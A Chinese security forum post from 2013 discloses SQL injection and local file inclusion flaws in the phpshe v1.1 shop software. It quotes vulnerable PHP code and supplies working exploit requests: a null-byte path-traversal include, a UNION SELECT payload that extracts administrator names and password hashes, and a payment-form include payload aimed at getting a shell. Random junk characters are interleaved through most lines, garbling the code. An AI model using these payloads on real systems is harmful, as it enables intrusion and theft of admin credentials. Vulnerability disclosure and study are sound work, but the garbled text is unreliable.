找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2442|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:01:54 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
/*******************************************************/
( W2 R# w' q% w7 r" i/* Phpshe v1.1 Vulnerability. _( y; W% c" @, n3 ]
/* ========================3 c. e3 k" X+ W  a
/* By: : Kn1f3
9 J/ r0 H: W& q9 y3 B4 ^/* E-Mail : 681796@qq.com2 X. X/ _, z% [% E
/*******************************************************/
$ ?2 f6 S! `  U- E9 n) P' _0×00 整体大概参数传输( z; H. ~3 }5 u% Q& W" B5 A
6 v. m% m& S) R' l5 {
. N! Y! @8 ~  C% F7 M
/ L; @0 |+ D7 E. b) k$ [
//common.php* @8 _! N& M. _* ]
if (get_magic_quotes_gpc()) {' V9 f* D$ I) I& ]) }
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
9 o5 v! e' y+ c& C6 R8 e!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
$ x1 [$ ^9 r6 M! M2 T}9 \# o% y" @8 R5 d0 s% ^" m2 s& O
else {1 p% U& U0 P3 ]  R' j' t1 Y4 j. S2 E9 w
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
: _* j% l, c; {- y! d4 @4 I( b6 m!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
  E* s6 I2 \+ ]% f}
" C8 L0 s1 P$ }9 p! P0 Q" Nsession_start();5 h' p# r. X- `. \8 S! n
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
& B9 e& D- ~& {' L/ l!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
1 q+ ~: F% ?& L8 a; @
* P- c0 B) g2 }" y$ z' w, S" A0×01 包含漏洞
2 k/ E& B) r, z8 f- `. z 6 o; H3 u; {$ w6 i
$ P9 |1 f0 _& N1 Q9 e5 w
//首页文件
2 R- S5 r* P8 C, [+ r& ^7 z<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
' i' {1 T* r% J1 G( Ninclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞6 C: h3 [4 x- p- d
pe_result();5 t4 n4 d. a, g/ i; Q+ i
?>, k3 E7 V) R) @  y" U8 t8 K' y+ A' ?
//common 文件 第15行开始
4 k! `( X( {' turl路由配置# {" n4 \+ q2 J0 ~
$module = $mod = $act = 'index';
3 h# m4 k6 X" w* ]' h! {0 [$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
7 P$ _' x4 T$ A/ M% x% Z3 L$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);9 X# c) R$ H6 P: j
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);8 H' q) X: m# Y& @0 S
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00* l# \1 ]0 T# h- @+ F


$ _. U! b2 q: K) m8 O: t8 ]& ^0 ^ 9 h# e( m# c1 H3 P0 Y$ r! D
0×02 搜索注入
6 X# F% {; P* S- u- e  f
' _: p  O3 S7 L<code id="code2">

//product.php文件
$ \: A6 u* X: ?! R, V$ I; Mcase 'list':
6 t  t; H4 ?' w- F! F/ K, Y3 P3 R9 k) U$category_id = intval($id);+ ]7 y3 Q# @  P  z6 T7 F
$info = $db->pe_select('category', array('category_id'=>$category_id));
  _3 M3 F; A% I4 g: D//搜索) K( @3 c4 {# E4 J8 _
$sqlwhere = " and `product_state` = 1";
* a6 O( Z. q* }  c' ppe_lead('hook/category.hook.php');
0 u+ t/ m3 J. [" ?9 v1 jif ($category_id) {2 P! n' z0 v& B/ G% P0 k, X
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
- b8 d2 c5 L/ j& t" }0 L+ ~7 U  g}
0 h4 f- M, L4 b- I' k$ S5 b7 [$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤7 ]5 a; G; {- T$ i9 ^+ A! N
if ($_g_orderby) {, C% R) w: @: e& ?( S: l4 G& T! V/ N; i$ e
$orderby = explode('_', $_g_orderby);: j* C6 ~# o" O0 L9 _! c( ?8 p
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
% ?& h0 J! e# l' a9 Q}' m5 D1 h6 a! x8 T' o
else {+ u5 u/ g* `. E& f5 M1 R. ?/ M; p
$sqlwhere .= " order by `product_id` desc";
# v# X( A5 q) ]: u+ R9 [1 {}7 K' _/ K4 M3 M9 ?1 }5 Y7 i' f
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));/ T  F! Q9 j7 R0 ~. C
//热卖排行
. W, c: ]6 T9 m4 B1 Y2 W2 W$product_hotlist = product_hotlist();
$ \' |# p; `  H9 h//当前路径
! r9 I8 T3 e# Y+ e5 r$nowpath = category_path($category_id);! I; k" O4 n% \& _% C9 O
$seo = pe_seo($info['category_name']);% n; C& V" A4 c$ [  ~
include(pe_tpl('product_list.html'));% _3 @2 `; N8 p6 S6 L8 @
//跟进selectall函数库! ~" ^) P. F/ K1 f/ c3 E& ]
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())* S! k" H3 r0 m# t/ L2 w! m$ }
{- M! K) L$ r* L1 y4 N2 k3 `1 l
//处理条件语句
3 y8 ], E2 T: `6 W7 _$sqlwhere = $this->_dowhere($where);
2 \- Z9 @( D, a/ _" N, n, q0 Sreturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
+ w) j9 d1 j! |4 @8 v3 o1 `! P}0 r- T5 O# l) m* i% C
//exp* ~, Q9 @. d& G7 B* k
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1& C* O' x6 Y' P: `

</code>) f/ q- j( i* j

+ q" s7 K/ q% x0×03 包含漏洞2
& E1 X7 w& g/ W: z  k  C
& W$ X! j$ J: y# i6 j/ l5 a<code id="code3">

//order.php

case 'pay':

0 x* e- Y" x9 x% A
$order_id = pe_dbhold($_g_id);


5 _& |" x- f$ C$ X$cache_payway = cache::get('payway');

8 M" Q3 r. I8 r1 e% b: G6 u# J
foreach($cache_payway as $k => $v) {

6 h1 ]8 Z: R7 m* l$ }5 T' q7 A
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

/ v- L$ d( R& B; t/ f
if ($k == 'bank') {

9 r7 L# `$ x9 c9 u9 e
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

# _7 L/ p! J% c* R& T
}


2 P2 n+ r; Z8 I2 U" b) }}

  p* E( y* }" a
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


' R) ^- j. a- P3 t!$order['order_id'] && pe_error('订单号错误...');

# |* j* m% n' L! ]% j1 C& |
if (isset($_p_pesubmit)) {

5 W' D( V7 U7 e
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

( X' c' ?3 g8 H: f3 R
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

5 `+ D1 K# \8 Z7 ?: N  O" L
foreach ($info_list as $v) {


! Q8 w* r6 u" o. j% j7 Y$order['order_name'] .= "{$v['product_name']};";
# R& C& ]* w4 u! Q  S" q3 e/ R

- ?* r* z; Y4 e. d5 F
}


" Z4 K- `7 A7 q' m+ l/ a9 Xecho '正在为您连接支付网站,请稍后...';


; y& A+ W3 c6 H, r; n$ Dinclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

/ E2 {; g9 H! j9 q: Y: R- g
}//当一切准备好的时候就可以进行"鸡肋包含了"


4 T/ Y/ h/ T0 Y! g+ ~* |% eelse {

3 z$ g5 x: J+ H7 E) Q* `) U
pe_error('支付错误...');


8 p% ~% Q& ?$ Y}


4 \& s# B' Z- w* O9 [2 O0 G}

. J; B( j; ~" U3 v( l
$seo = pe_seo('选择支付方式');

, E/ s: F7 d3 i% I
include(pe_tpl('order_pay.html'));

6 |8 s6 R- P8 V8 [' t7 ~
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
$ J3 a! W- f9 e! N' |, b5 g

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表